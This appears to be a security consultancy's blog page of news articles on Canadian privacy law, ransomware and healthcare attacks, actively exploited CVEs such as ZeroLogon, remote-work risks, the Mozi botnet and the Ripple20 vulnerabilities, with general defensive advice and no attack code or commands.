Thought leadership. threat analysis, news and alerts.
Canada’s Proposed Privacy Law Aims to Impose Stronger Fine of Up to 5% of Global Revenue or $25 Million
Canada’s Proposed Privacy Law Aims to Impose Stronger Fine of Up to 5% of Global Revenue or $25 Million
The federal government of Canada, through the Office of the Minister of Innovation, Science and Industry, has proposed a new privacy law for the private sector that aims to impose a stronger fine on organizations that remiss in protecting the privacy of Canadians.
The new proposed privacy law called the “Consumer Privacy Protection Act (CPPA),” also known as the Digital Charter Implementation Act, 2020, aims to impose administrative fines of up to 3% of global revenue or $10 million, whichever is higher, for non-compliant organizations. This new proposed privacy law also aims to impose fines for certain serious violations of the proposed law of up to 5% of global revenue or $25 million, whichever is higher.
Section 57, paragraph 3 of the Digital Charter Implementation Act, 2020 states that “security safeguards must protect personal information against, among other things, loss, theft and unauthorized access, disclosure, copying, use and modification.”
"The COVID-19 pandemic has accelerated the digital transformation, which is changing how Canadians work, access information, access services, and connect with their loved ones,” said Navdeep Bains, Minister of Innovation, Science, and Industry. “This transformation is making concerns about privacy, and how companies handle Canadians’ data, more important than ever. As Canadians increasingly rely on technology, we need a system where they know how their data is used and where they have control over how it is handled.”
Right to be Forgotten
The new proposed privacy law has its own version of the principle of "Right to be Forgotten." This right, also known as the right to erasure, gives individuals the right to ask organizations to delete their personal data.
The Digital Charter Implementation Act, 2020 gives Canadians the ability to demand that their personal information on platforms, including social media platforms, be permanently deleted in case when consent is withdrawn or when information is no longer necessary.
Canada’s Major Data Breach
In November 2019, LifeLabs, Canada’s largest provider of general diagnostic and specialty laboratory testing services, informed the Office of the Information and Privacy Commissioner of Ontario (IPC) and the Office of the Information and Privacy Commissioner for British Columbia (OIPC) that cybercriminals gained entry into the company’s systems, extracted data and demanded a ransom. LifeLabs informed the IPC and OIPC that the data breach affected systems that contained information of approximately 15 million LifeLabs customers (nearly half of Canada’s total population), including names, physical addresses, email addresses, customer usernames and passwords, health card numbers, and lab tests. The vast majority of these affected customers are from British Columbia and Ontario.
A joint investigation conducted by IPC and OIPC found that LifeLabs failed to protect the personal information of millions of Canadians resulting in a significant data breach in 2019. According to the two offices, LifeLabs failed to take the following reasonable steps:
The Office of the Information and Privacy Commissioner of Ontario and the Office of the Information and Privacy Commissioner for British Columbia both ordered LifeLabs to implement a number of cybersecurity measures to address the company’s shortcomings. Despite their findings, however, the two offices didn’t impose financial penalties on LifeLabs as there’s no law that allows them to.
“LifeLabs exposed British Columbians, along with millions of other Canadians, to potential identity theft, financial loss, and reputational harm,” said Michael McEvoy, Information and Privacy Commissioner of British Columbia. “This investigation also reinforces the need for changes to BC’s laws that allow regulators to consider imposing financial penalties on companies that violate people’s privacy rights. This is the very kind of case where my office would have considered levying penalties.”
In a separate statement, LifeLabs said that as a result of the cyberattack, it took several measures, including retrieving the data by “making a payment.” The company, however, didn’t mention how much it paid to the attackers.
The company also didn’t mention ransomware. While the LifeLabs cyberattack has the markings of a ransomware attack, it isn’t confirmed whether the attack was a ransomware attack.
Traditionally, ransomware attacks encrypt victims’ files, locking out victims from these files. Ransomware attackers then demand ransom from victims in exchange for the decryption keys that would unlock the locked files. Majority of today’s ransomware attackers also demand an additional ransom payment in exchange for the non-publication of the stolen data gathered during the ransomware attack.
Personal Health Information Protection Act (PHIPA)
On March 25, 2020, the Ontario government amended the Personal Health Information Protection Act (PHIPA), Ontario’s health privacy law. Once implemented, Ontario will be the first Canadian province to levy monetary penalties against individuals and companies that contravene the province’s health privacy law.
The amendment to PHIPA doubles the maximum fines for an offense to $200,000 for individuals and $1,000,000 for corporations. The amendment also mandates that an individual be imprisoned up to a year for an offense.
“Perhaps most significantly, once regulations are in place, my office [Information and Privacy Commissioner of Ontario] will be given the power to levy monetary penalties against those who contravene our health privacy law, including for breaches, such as those resulting from abandoned records,” said Brian Beamish, Information and Privacy Commissioner of Ontario. “Privacy commissioners across the country have been calling for the power to impose administrative penalties, and Ontario will be the first to enshrine it into legislation.”
How to prevent ransomware attacks: Best practices guide
Ransomware attacks are becoming common. The city of Saint John in New Brunswick recently fell victim to a ransomware attack.
What Is Ransomware Attack?
Ransomware attack is a type of cyberattack in which victims’ files are locked and held for ransom. In a ransomware attack, an attacker promises that in exchange for a ransom payment, the key or keys that would unlock the lock files would be released.
Ransom payment isn’t a guarantee that your organization will get back your files as some keys given by attackers don’t work by design or through errors in coding. Today’s ransomware attackers demand two ransom payments, one for unlocking the locked files, and another ransom payment to prevent them from publishing stolen data. This second ransom payment shows that today’s ransomware attackers, not just lock victims’ files but also steal data.
City of Saint John Ransomware Attack
A few weeks ago, the city of Saint John in New Brunswick fell victim to a ransomware attack. Last November 17, Don Darling, the Mayor of the city of Saint John, confirmed that the city’s IT system was hit by ransomware.
To protect the city’s IT system, the Mayor of Saint John said the city’s website, servers, and email system have been disabled. Due to the nature of the attack, the Mayor said the city won’t comment on the ransom demand. Saint John city manager John Collin, meanwhile, said that as of November 17, there was no indication that personal information was accessed or transferred in the ransomware attack.
Weeks after the ransomware attack, the Saint John city manager said that the city departments' phone lines, email to most city hall employees, and online payments are still unavailable. Saint John city manager said that taking the systems offline was an "immediate and proactive" response to contain the attack. "Our network will be back online only once we are sure that it is safe to do so," he said.
In the case of the city of Saint John, it wasn’t revealed how the ransomware attacker or attackers’ initially compromised the city’s IT system.
Exposure via Third-Party Software
The recent ransomware attack on the city of Saint John isn’t the first time that the city fell victim to a cyberattack.
In December 2018, Stas Alforov, director of research and development for Gemini Advisory, said the firm discovered nearly 300,000 payment records in underground marketplaces that specialize in the sale of compromised payment card data. According to Alforov, the payment records were stolen from 46 confirmed compromised US locations and one Canadian location, with 6,000 payment records from Canada. That one Canadian location is the city of Saint John.
Alforov said the breach of nearly 300,000 payment records is part of the larger hacking operation conducted by the same hacking group. Analysis of the card data, Alforov said, found that payment records have likely been stolen from municipal government services that used the software called “Click2Gov,” a payment software primarily used by local governments to receive various payments.
In the case of the city of Saint John, the Click2Gov payment software was used for paying parking tickets through the city's website. Alforov told Huffington Post Canada that he received a call from the city of Saint John after the publication of his report. The city, he said, wasn't aware of the data breach. Alforov added that the city’s parking ticket payment system appeared to have been breach back in September 2017.
To date, there’s no information on whether the past data breach on the city of Saint John’s parking ticket system is related to the recent ransomware attack.
Other victims of ransomware attacks such as the city of Keene, Texas, were able to establish the link between the compromised third-party software and the resulting ransomware attack. In August 2019, Keene Mayor Gary Heinrich told NPR that ransomware attackers compromised the software used by the city. This software, the mayor said, was managed by a third-party company. Said software was also used by close to two dozen local governments in Texas, which also fell to a collective ransomware attack.
"They got into our software provider, the guys who run our IT systems," Heinrich said. "Well, just about everything we do at City Hall is impacted.”
The ransomware attack on the local governments of Texas, including the City of Keene, showed a gateway by which ransomware attackers initially compromise their victims, that is, through third-party software.
Cybersecurity Best Practices
Here are some of the best cybersecurity practices against ransomware attacks:
Properly Vet Third-Party Software
Third-party software, which your organization has no control over the source code, should be properly vetted in the cybersecurity area.
Keep All Software Up to Date
Apply in a timely manner software updates, also known as patches, that are released by software vendors. These patches not only contain feature upgrades but also updates fixing known security vulnerabilities.
Ransomware attackers have been known to initially compromise victims by exploiting a known security vulnerability, in which the software vendor already released a patch but the software users failed to apply the patch in a timely manner.
Practice the 3-2-1 Backup Rule
The 3-2-1 backup rule is your organization’s best defense against the first type of ransom demand: ransom demand to unlock files. The 3-2-1 backup rule states that three backup copies should be kept, two in different formats, and one of these copies should be kept offsite.
This isn’t, however, the answer to the second type of ransom demand: ransom demand to prevent stolen data publication.
When you need help, our team of cybersecurity and IT experts is a phone call away. Connect with us today, and take a proactive approach to cybersecurity.
Upcoming Holiday Shopping Season Brings New Level of Cybercrime Threats to Online Retailers
Online shopping this holiday season is projected to be unprecedented, with many people staying at home and opting to shop online as a result of the COVID-19 mandatory lockdown or due to self-imposed lockdown.
The expected online shopping surge creates a perfect stage for cybercrimes.
Shift to Online Shopping
Statistics Canada reported that from February 2020 to May 2020, retail e-commerce sales soured by 99.3%. The record gain in e-commerce, however, resulted in a record decline in retail sales.
Statistics Canada reported that for the same period, the total retail sales fell by 17.9%. The impact of COVID-19, Statistics Canada said, is best highlighted using the April 2020 data, with a 26.4% decline in retail sales compared to the April 2019 data.
A survey conducted by Deloitte showed that 47% of Canadian consumers said they’ve been shopping online more often since the COVID-19 crisis began. The survey further showed that the same number of Canadian consumers (47%) will likely head online to find gifts and other items this holiday season, with the remaining 53% to head to traditional retails stores. While the number of those who intend to do their shopping in the traditional way is few points higher than those who intend to shop online this holiday season, this data is high enough as 69% of holiday shoppers shopped in the retails stores during the holiday season in 2019.
“A lot has changed since the 2019 outlook,” Deloitte said. “COVID-19 has changed how Canadians live, work, and shop, and it has turbocharged the fundamental shifts in consumer behaviour that were already underway.”
Imperva, meanwhile, reported that from March 1 to March 22, 2020, retail websites’ traffic worldwide soured by as much as 28% on a weekly average.
Holiday Season Cybercrime Threats
A new report from Imperva showed that the upcoming holiday shopping season will present online retailers with a new level of traffic, at the same time, never seen before level of cybercrime threats. According to Imperva, online retailers will face the following cybercrime threats this holiday season:
Bad Bots Attacks
According to Imperva, bad bots, as a group, is a top threat to online retailers, before and during the pandemic. A bad bot refers to a software application that runs automated tasks over the internet.
As opposed to a good bot which runs automated tasks over the internet for legitimate purposes, the purpose of a bad bot is malicious. Bad bots interact with software applications in the same way as legitimate users would, making them indistinguishable from legitimate users.
An example of a bad bot is a bot that interacts with a website’s login interface, attempting to “brute-force” its way by attempting to login using the trial and error method in guessing the correct username and password combination. Aside from brute-force attacks, bad bots are used for competitive data mining, personal and financial data harvesting, and more.
According to Imperva, API attacks are attractive targets due to the sensitive payment data they hold. The volume of attacks on retailers’ APIs far exceeded average levels this year, Imperva said.
API, short for An Application Programming Interface, is a software intermediary that allows other software applications to communicate with one another. A website API, for instance, connects between applications such as databases.
According to Imperva, retail sites experienced an average of eight application layer DDoS attacks a month, with a significant spike in April 2020 as lockdowns resulted in the demand for online shopping. DDoS, short for distributed denial of service, refers to a cyberattack that attempts to make an online service, such as a website, unavailable to legitimate users.
DDoS uses bad bots. In DDoS attacks, bad bots are organized into a botnet – referring to hijacked computers that are controlled by attackers to conduct malicious activities such as DDoS attacks. Application layer DDoS, meanwhile, is a type of DDoS attack comprised of malicious requests with the end goal of crashing the web server.
According to Imperva, retail sites are vulnerable to client-side attacks as many of these sites are built on frameworks using a number of third-party code. Client-side refers to anything that’s displayed or takes place on the client – end user – using a browser. This includes what the user sees on the site’s online form.
The attack on Ticketmaster is an example of a client-side attack. In June 2018, Ticketmaster made public that they had been compromised and that attackers stole customer information. RiskIQ, the company that discovered the attack, reported that Ticketmaster wasn’t directly compromised but the site’s third-party supplier known as Inbenta was. According to RiskIQ, attackers either added or replaced Inbenta’s code used for Ticketmaster with a malicious one.
A client-side attack also directly compromises the website itself. Such was the case in the British Airways website client-side attack. The attack was discovered by RiskIQ.
According to RiskIQ, a malicious code was found in British Airways’ baggage claim page where customers were required to enter their personally identifiable information. The malicious code then sent the information entered to a URL that looked like it belonged to British Airways. Upon closer inspection, however, the URL wasn’t owned by British Airways.
It’s still unknown how the malicious code got into the British Airways’ site in the first place.
Worried about your website or web application and looking to better protect it? Contact us today to see how to mitigate the risks quickly and efficiently.
Increased Cybercrime Threat to Canadian Healthcare Organizations
In recent months, threat actors have launched cyberattacks against organizations in the healthcare sector, including those based in Canada, according to the latest report released by Microsoft.
In the blog post "Cyberattacks targeting health care must stop," Tom Burt, Corporate Vice President for Customer Security and Trust at Microsoft, said that the targets include organizations in the health sector in Canada, France, India, South Korea and the United States. Burt identified three threat groups and gave these threat groups codename: Strontium, Zinc and Cerium.
According to Burt, Strontium uses password spray and brute force login attempts to steal login credentials. “These are attacks [password spray and brute force login attempts] that aim to break into people’s accounts using thousands or millions of rapid attempts,” Burt said.
Password spray refers to a cyberattack that uses a small number of common passwords to brute force large numbers of accounts. Brute force attack, meanwhile, refers to a cyberattack that uses the trial-and-error method in guessing the correct username and password combination.
According to the Corporate Vice President for Customer Security and Trust at Microsoft, Zinc and Cerium use spear-phishing lures for credential theft. Spear-phishing is a cyberattack in which a threat actor, masquerading as a trusted individual or entity, tricks targeted individuals into clicking a bogus email, text message or instant message.
In the case of the threat actor Zinc, the Corporate Vice President for Customer Security and Trust at Microsoft said the spear-phishing lures for credential theft, sending messages with fabricated job descriptions pretending to be recruiters, while threat actor Cerium engaged in spear-phishing email lures using Covid-19 themes while masquerading as World Health Organization representatives.
Ransomware Attacks in the Healthcare Sector
The Canadian, Australian, the U.S. and UK Governments, meanwhile, issued separate alerts warning about the increased ransomware activity targeting the healthcare sector. Ransomware is a type of cyberattack that uses a malicious software (malware) that encrypts victims’ files, locking out victims of these files.
In traditional ransomware attacks, attackers demand from the victims ransom in exchange for the keys that would unlock the encrypted files. Modern-day ransomware attackers not just demand ransom to unlock the encrypted files, they also demand ransom in exchange for not publishing the stolen files gathered during the ransomware attack.
In September of this year, the University Hospital Düsseldorf in Germany reported a ransomware attack. The attack rendered 30 servers used by the hospital inoperable, forcing the hospital to turn away patients even those with life-threatening conditions.
According to German authorities, a patient with a life-threatening condition was turned away and sent to another hospital some 20 miles away and died as a result of the treatment delay. This is the first reported death as a result of a cyberattack.
Threat Actors Tool Evolution
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) issued the alert “Ransomware Activity Targeting the Healthcare and Public Health Sector,” warning that threat actors targeting the U.S. healthcare sector use the malware called “BazarLoader,” often leading to ransomware attacks, data theft, and the disruption of healthcare services.
In a recent alert “Renewed Cyber Threats to Canadian Health Organizations,” the Canadian Centre for Cyber Security (Cyber Centre) said threat actors targeting the Canadian healthcare sector have been observed using the BazarLoader malware for initial compromise on victims’ networks for the eventual deployment of the ransomware called “Conti,” believed to be the successor of Ryuk ransomware. The Cyber Centre said that the BazarLoader malware is typically deployed via a phishing email.
Phishing, in general, doesn’t have a particular target as its aim is to victimize whoever takes the bait. Opposite to phishing is spear-phishing which targets certain individuals or organizations.
The BazarLoader malware, the Canadian Centre for Cyber Security said, provides a backdoor through which additional malware is introduced to the victim’s network. Once inside the victim’s network, the Cyber Centre said, the malware called “Anchor” is used to maintain a presence on the network. Anchor is comprised of a framework of tools that allows the covert uploading of malicious tools, and, once done, to remove any evidence of malicious activity.
The Australian Cyber Security Centre, meanwhile, issued its own alert "SDBBot Targeting Health Sector," warning that it has observed increased targeting activity against the Australian health sector by threat actors using the SDBBot Remote Access Tool for the eventual deployment of ransomware called “Clop.”
SDBBot has three components: 1) an installer that allows threat actors to establish persistence on the victim’s network; 2) a loader that downloads additional components; and 3) the remote access tool itself allows threat actors full control of compromised computers, remotely. Once inside the victims’ networks, threat actors also use SDBBot to move within the victims’ networks and steal data.
Cybersecurity Best Practices
Below are some of the cybersecurity best practices to mitigate the risks:
Is your organization at risk? Let us help you evaluate your controls quickly and efficiently.
Email us today at firstname.lastname@example.org and sleep better at night knowing that your business is well protected against cybercriminals.
Canadian Centre for Cyber Security Warns About the Continued Exploitation of Multiple Vulnerabilities
Canadian Centre for Cyber Security Warns About the Continued Exploitation of Multiple Vulnerabilities
The Government of Canada, through the Canadian Centre for Cyber Security, has warned that threat actors are exploiting multiple known vulnerabilities present in information systems in Canada.
According to the Canadian Centre for Cyber Security (Cyber Centre), as information systems and the networks linking them are critical components in today’s interconnected world and relied upon by governments, small businesses and individuals worldwide, the need to secure them is of utmost importance. The Cyber Centre’s warning is similar to the U.S. Government’s warning, through the National Security Agency (NSA), that threat actors are targeting U.S. information systems such as unpatched remote access services, security appliances and application servers.
"The Cyber Centre continues to receive reports of persistent exploitation of known vulnerabilities," the Cyber Centre said. “While manufacturers work hard to provide updates for vulnerabilities, these updates are not always applied in a timely manner by consumers.”
Among the vulnerabilities that are being actively exploited by threat actors according to the Cyber Centre and NSA are the following:
Microsoft Netlogon Elevation of Privilege Vulnerability
This vulnerability, designated as CVE-2020-1472 and commonly known as ZeroLogon, is described by Microsoft as an elevation of privilege vulnerability that exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC) – Microsoft Windows’ core authentication component of Active Directory that provides authentication for user and computer accounts.
“By simply sending a number of Netlogon messages in which various fields are filled with zeroes, an attacker can change the computer password of the domain controller that is stored in the AD [Active Directory],” Tom Tervoort, Senior Security Specialist at Secura and the one who discovered the Netlogon vulnerability, said in the whitepaper “ZeroLogon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472).” “It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain.”
Remote Code Execution Vulnerability Affecting Citrix Application Delivery Controller (ADC)
ADC is described by Citrix as a networking appliance whose function is to “improve the performance, security and resiliency of applications delivered over the web.” Designated as CVE-2019-19781, this security vulnerability in Citrix ADC, if exploited, could allow an unauthenticated attacker to perform remote code execution – the ability of an attacker to access or make changes to another computer, regardless of where the attacker’s computer is geographically located.
In July of this year, the Canadian Centre for Cyber Security reported that several computer networks in Canada were compromised and, in each case, a threat actor was able to compromise infrastructure exposed to the internet because the software running on an exposed server wasn’t patched to the latest version or properly secured via two-factor authentication. According to the Cyber Centre, prior to the successful compromise of vulnerable and improperly secured servers and network access devices, intensive reconnaissance-style scanning of target networks is often conducted by malicious actors. In some cases, malicious software (malware) was installed and compromised infrastructure may have been used in attempts to compromise other networks and/or other organizations.
Cybersecurity Best Practices
While it’s important to keep all software and firmware up to date, this alone isn’t the whole solution in keeping your organization safe from attackers.
Rare Cases of Multiple Patches
Microsoft is addressing the CVE-2020-1472 vulnerability via a two-part patch rollout. The first patch was released on August 11, 2020 and the last patch will be released in the first quarter of 2021.
What should be done before the arrival of the second part of the patch? Aside from applying the August 11th patch, according to Microsoft, the following steps should be taken:
False Sense of Security
It’s important to note that patching alone doesn’t fix a successful network compromise conducted via vulnerability exploitation. For instance, applying the patch for CVE-2019-19781 vulnerability, released by Citrix in January 2020, isn’t enough to fix a network compromised via CVE-2019-19781 exploitation.
In July 2020, Fox-IT reported that back in January 2020, just a few days after the release of the CVE-2019-19781 patch, a total of 1,030 compromised servers were identified, including those owned by Governmental organizations and Fortune 500 companies.
“However, of perhaps more concern was that, of these compromised devices, 54% had been patched against CVE-2019-19781, thus providing their administrators with a false sense of security,” Fox-IT said. “This is because although the devices were indeed patched, any backdoor installed by an attacker prior to this would not have been removed by simply installing the vendor’s patch.”
CVE-2019-19781 also showcased how attackers compete to remain in the networks that they’ve compromised, also known as "hacker turf war." Some threat actors applied the CVE-2019-19781 patch themselves to block other threat actors in what is known as “adversary patching.”
If for some reason your organization has failed to apply a critical patch in a timely manner, expect that credentials, accounts and software have been changed prior to the application of the patch and expect that patching won't alleviate the situation.
Shift to Remote Workforce: The Need for Remote IT Support
More than half a year into the pandemic, many have come to accept that office life as we know it is unlikely to come back – at least not for the foreseeable future.
As of September 2020, Statistics Canada reported that a large number of Canadians continued to adapt to COVID-19 by working remotely, with over twice as many people working from home (4.2 million) than those who usually do so (1.9 million). The work from home set-up, however, has opened up cybersecurity challenges that never existed with the office-based workforce, which, in turn, calls for remote IT support.
Cybersecurity Challenges with a Remote Workforce
Here are some of the cybersecurity challenges faced by organizations with remote workforce:
Patching refers to the application of a security update that fixes security vulnerabilities. In the past, when people still used to work in the office, patching is easily done by walking into the office and patch computers that need patching.
With a remote workforce, workers are no longer in the office but working at home. Patching workers’ computers, especially whenthey’re using their personal computers is a challenge.
Timely patching is important as threat actors are quick in exploitingunpatched computers. Microsoft, for instance, recently warned that threat actors are actively attempting to exploit the security vulnerability in Windows Server operating systems designated as CVE-2020-1472 and commonly called “Zerologon”.
Microsoft reported that even as the company had released a patch for Zerologon last August 11th, a surge of Zerologon exploitation has been observed since September 13th, following the publication of several proof-of-concept tools that exploit the Zerologon vulnerability. CVE-2020-1472 is a security vulnerability that essentially turns an attacker into an IT administrator, allowing the attacker to change the computer password of Windows Server operating systems with the Active Directory domain controller role. Active Directory is Microsoft’s proprietary directory service that gives IT administrators the capacity to authenticate computers within a network.
According to Microsoft, prior to exploiting the Zerologon vulnerability, one attacker was observed exploiting the CVE-2019-0604 vulnerability in SharePoint to initially access Windows Server operating systems. Microsoft described this vulnerability as a remote code execution vulnerability that exists in Microsoft SharePoint when the software fails to “check the source markup of an application package”. An attacker who successfully exploits this vulnerability, Microsoft said, could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.
According to the Canadian Centre for Cyber Security, Canadian organizations are being exploited via unpatched devices and inadequate authentication. “In each case, a threat actor was able to compromise infrastructure exposed to the internet because it was not properly secured via 2FA and/or because software running on an exposed server was not patched to the latest version,” the Canadian Centre for Cyber Security said.
The work from home model forces many organizations to allow remote workers to remotely access network resources, opening up a plethora of cybersecurity vulnerabilities.
Remote Desktop Protocol (RDP)
One of the weakest links in allowing remote workers to access corporate networks is by exposing Remote Desktop Protocol (RDP) to the internet. RDP is a proprietary protocol developed by Microsoft that allows a Windows user to connect to Windows workstations or server over the internet.
Kaspersky Lab reported that since the start of the global pandemic in March of this year, brute force attacks against RDP has rocketed across almost the entire planet. Brute force attack uses the trial-and-error method in which an attacker uses as many username and password combinations in the hope of guessing the correct one.
“The lockdown has seen the appearance of a great many computers and servers able to be connected remotely, and right now we are witnessing an increase in cybercriminal activity with a view to exploiting the situation to attack corporate resources that have now been made available (sometimes in a hurry) to remote workers,” Kaspersky Lab said.
“Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections,” Microsoft said. “Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.”
Virtual Private Network (VPN)
The use of Virtual Private Network (VPN) is one of the measures in securing RDP. This too has been the subject of attacks by threat actors.
In August of this year, the Canadian Centre for Cyber Security issued an alert warning organizations of the active exploitation of the vulnerabilities in the VPN products of Fortinet, Palo Alto and Pulse Secure. The software vendors of these VPN products have all issued a corresponding patch prior to the issuance of the security alert of the Canadian Centre for Cyber Security.
Role of Remote IT Support
As the world moves towards a remote workforce, it’s not surprising that IT support is now being done remotely as well.
The recent exploitations of CVE-2020-1472, CVE-2019-0604 and VPN products highlight the importance of timely patching. A remote IT support can assist your organization in patch management, including planning and prioritizing software and firmware updates within a network. If not properly planned, a patch can cause extended downtime, resulting in revenue loss.
A remote IT support can also assist your organization in using network perimeter security devices such as Firewalls and remote access gateways for remote workers and remote IT administrators.
Mozi Botnet Accounts for 90% of Traffic to and from IoT Devices, IBM Report Shows
Researchers at IBM recently reported that 90% of traffic to and from all internet of things (IoT) devices comes from the botnet called “Mozi”.
What Is a Botnet?
A botnet, also known as “zombie army”, is a group of hijacked computers, including IoT devices. These hijacked computers are each infected with malicious software (malware) for the purpose of controlling these computers from a remote location without the knowledge of the owners of the hijacked computers.
Threat actors have used these hijacked computers for malicious activities such as distributed denial-of-service (DDoS) attacks. In a DDoS attack, the traffic from hijacked computers are directed towards a target, for instance, a website, overwhelming the target with traffic, rendering it inaccessible to legitimate users. A malicious actor, for example, sent a DDoS ransom note, taunting a target that their "Botnet army" is ready to take down the target's website and that the target has 48 hours to pay the ransom.
What Is Mozi Botnet?
Researchers at 360 Netlab first reported about the Mozi botnet. According to the researchers, they first observed Mozi in the wild in September 2019.
In the recent report released by researchers at IBM, the researchers said that Mozi accounted for nearly 90% of the observed IoT network traffic from October 2019 to June 2020. They added that the overall combined IoT attack instances from October 2019 to June 2020 increased by 400% compared to the combined IoT attack instances for the previous two years.
This massive traffic from Mozi, the researchers at IBM suggested, that this botnet didn’t remove competitors from the market, but rather flooded the market and dwarfing other botnets. The hijacking of IoT devices to form part of the Mozi botnet, the researchers said, could be due in part to the ever-expanding IoT landscape.
According to IBM researchers, there are nearly 31 billion IoT devices deployed around the world, with IoT deployment rate now stands at 127 devices per second. IoT devices include consumer IoT (security cameras and lighting control); commercial IoT (internet-connected pacemakers and vehicle trackers); enterprise IoT (projectors, routers and security systems); industrial IoT (production line automation systems and aircraft systems); infrastructure IoT (traffic control devices and utility monitoring devices), Internet of Military Things (wearable combat biometrics devices, robots and surveillance equipment).
Researchers from 360 Netlab and IBM reported that Mozi is capable of conducting these malicious activities: conduct DDoS attack (HTTP, TCP, UDP), carry out command execution attack, download malicious payload from specified URL and execute it, and gather bot information. Devices affected by Mozi include Netgear, D-Link and Huawei routers.
How Mozi Hijacks IoT Devices to Form Part of Its Botnet?
According to IBM researchers, nearly all of the initial entry to these Mozi-hijacked devices was done through command injection (CMDi) attacks.
“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application,” Open Web Application Security Project (OWASP) defines CMDi. “Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code.”
Researchers at IBM said CMDi attacks are extremely popular against IoT devices for the following reasons:
First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited.
Second, PHP modules that are built into IoT web interfaces can be exploited, giving threat actors remote execution capability.
Third, IoT interfaces are often left vulnerable when deployed as administrators “fail to harden the interfaces by sanitizing expected remote input”. This failure, the researchers said, allows threat actors to input shell commands.
Fourth, new vulnerabilities require constant updating and slow patch implementation can be exploited.
Fifth, CMDi attacks can easily be automated, allowing threat actors to hijack a large number of IoT devices quickly at low cost.
Sixth, IBM researchers suggested that Mozi continues to be successful largely through the use of CMDi attacks as corporate networks are being accessed remotely more often due to COVID-19.
Israel-based cybersecurity firm JSOF earlier reported that vulnerabilities in Treck TCP/IP stack put hundreds of millions of IoT and embedded devices at risk. Developed 20 years ago, Treck TCP/IP stack is a piece of software that serves as a basic building block for IoT or embedded device that works over a network.
Out of the 19 security vulnerabilities discovered on Treck TCP/IP, 4 are rated critical remote code execution vulnerabilities. In remote code execution, a threat actor from any geographical location could run malicious programs on the target device.
Cybersecurity Best Practices
Here are some cybersecurity best practices in preventing your organization’s IoT devices from being hijacked and made part of a botnet: keep all firmware up to date and retire devices that no longer receive security updates.
Using outdated IoT devices or those that no longer receive security updates leave these devices vulnerable to hijacking and being made part of a botnet for malicious activities such as DDoS attacks.
On the flip side, with the proliferation of hijacked IoT devices, it’s important to protect your organization from DDoS attacks.
Bugs in Treck TCP/IP Stack Put Hundreds of Millions of IoT and Embedded Devices At Risk
Nineteen vulnerabilities in a piece of software called “Treck TCP/IP Stack” have recently been discovered. This piece of software is present in hundreds of millions of IoT and embedded devices, putting these devices and connected devices at risk.
The 19 vulnerabilities in Treck TCP/IP stack is collective called “Ripple20”, giving emphasis on the word “ripple”, as the ripple effect of these vulnerabilities has grown exponentially due to the supply chain factor. Out of the 19 vulnerabilities discovered, 2 were disclosed anonymously and 17 were disclosed by Israel-based cybersecurity firm JSOF.
“A single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies, and people,” JSOF said in the report "19 Zero-Day Vulnerabilities Amplified by the Supply Chain". “Ripple20 reached critical IoT devices from a wide range of fields, involving a diverse group of vendors.”
Tracing the Supply Chain
TCP/IP stack was developed 20 years ago by the firm called “Treck”. This piece of software serves as a basic networking element or a building block, useful in any context for any IoT or embedded device that works over a network.
According to JSOF, over the past two decades, Treck TCP/IP has been spreading around the world, through both direct and indirect use. JSOF reported that in the 1990s, Treck collaborated with a Japanese company named Elmic Systems. The two later went their separate ways, resulting in two separate branches of the TCP/IP stack devices, one managed by Treck and the other one managed by Elmic Systems. Other than ELMIC, the Treck TCP/IP stack is also known by other names such as Net+ OS, Quadnet, GHNET v2, and Kwiknet.
Printers, routers, infusion pumps in the medical sector, and industrial controls are some of the devices affected by these vulnerabilities. Affected device vendors as a result of the 19 vulnerabilities discovered in Treck TCP/IP include HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, and Baxter. JSOF estimates that the discovered 19 vulnerabilities affect hundreds of millions or more devices.
Security Vulnerabilities in Treck TCP/IP
Out of the 19 security vulnerabilities discovered on Treck TCP/IP, 4 are rated critical remote code execution vulnerabilities with CVSS ≥ 9; 4 are major with a CVSS ≥ 7; and 11 more have various lower severity. CVSS, short for Common Vulnerability Scoring System, is the industry standard for assessing the severity of computer system security vulnerabilities, most critical of which is rated 10.
Security vulnerabilities designated as CVE-2020-11896, CVE-2020-11898, and CVE-2020-11901 are some of the notable out of the 19 vulnerabilities.
CVE-2020-11896 is a critical vulnerability in Treck TCP/IP stack. This vulnerability allows for remote code execution by any attacker that can send UDP packets to an open port on the target device. Remote code execution allows attackers from any geographical location to run programs on the target device.
CVE-2020-11898 is a security vulnerability in Treck TCP/IP stack that improperly handles an IPv4/ICMPv4 Length Parameter Inconsistency, which allows remote attackers to trigger an information leak. JSOF researchers tested the CVE-2020-11896 and CVE-2020-11898 vulnerabilities on Digi Connect ME 9210 – a device that’s embeddable and is used in medical devices. Digi Connect can be purchased from any of the large electronic-parts resellers, amplifying these vulnerabilities as any device embedded also becomes vulnerable.
Among the 19 security vulnerabilities in Treck TCP/IP stack, the most severe is CVE-2020-11901, receiving a CVSS score of 9.1. This vulnerability is a collection of vulnerabilities for several critical client-side vulnerabilities in the DNS resolver of the Treck TCP/IP stack.
If successfully exploited, this vulnerability allows pre-authentication arbitrary remote code execution. This vulnerability is of particular interest because a sophisticated attacker, such as a nation state “can potentially reply to a DNS request from outside of the corporate network, thus breaking network segmentation,” researchers at JSOF said.
